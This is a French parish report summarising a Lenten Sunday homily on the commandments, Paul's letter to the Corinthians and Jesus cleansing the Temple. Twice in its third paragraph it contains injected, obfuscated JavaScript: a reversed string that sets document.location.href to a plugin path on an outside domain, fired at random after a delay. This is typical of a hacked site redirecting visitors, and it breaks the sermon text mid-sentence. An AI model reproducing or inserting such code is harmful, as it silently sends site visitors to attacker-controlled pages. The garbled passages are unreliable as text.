En ce troisième dimanche du temps de carême, le Seigneur Jésus nous invite particulièrement à continuer à préparer nos cœurs plus que nos corps car des fois nous n’y prenons pas garde à cause de nos péchés. Le père Marcien NDAYIZEYE qui a présidée à la célébration eucharistique de dix heures en a appelé à la conscience de tout un chacun pour analyser la distance qui se trouve entre nous et Dieu en vue de la réduire au maximum. Ceci nous permettra de garder notre communion et notre alliance avec Lui à travers les commandements comme nous l’avons entendu dans la première lecture Exode 20, 1-17).

Comme ils sont à la base de notre communion avec Dieu et notre prochain, les commandements divins nous aident à changer nos comportements humains  avides du pouvoir et de l’avoir mondains pour embrasser une vie simple et paisible en Dieu. Partant de la deuxième lecture tirée de l’Épitre de saint Paul apôtre aux Corinthiens (1, 22-25), le Père célébrant a invité les fidèles à chercher à témoigner pour Dieu tout comme lui, Paul, l’avait fait.  La sagesse qu’on reçoit de l’Esprit Saint nous mène à Dieu; les juifs tout comme les Grecs ont cherché l’intelligence et la sagesse à travers des  signes mais ils n’y sont pas parvenus. Ils n’ont pas su que le seul moyen sûr d’y arriver est de passer par Jésus qui est à la fois le chemin, la vérité et la vie. Et pour arriver à Jésus il faut observer les commandements divins.

L’évangile selon saint Jean (2, 13-25), nous a incité de plus à nous tourner vers Dieu et sa Parole tout en respectant le lieu du culte, le Temple. Nous sommes toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc invités à ouvrir nos yeux de l’âme pour apprécier la place qu’on toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne à Dieu dans notre vie ainsi que le respect au lieu du culte et le jour du sabbat. Bien entendu, le respect du lieu de culte implique également le respect de notre corps qui est aussi le temple de Dieu selon les mêmes Ecritures. Jésus nous demande à préparer nos cœurs et notre âme avant de nous présenter devant Dieu pour bien mériter ses grâces. Et tout au long de cette belle période de carême, nous sommes invités à faire le jeûne dans la prière et l’observance des commandements divins pour notre purification.

Ingrid MUNEZERO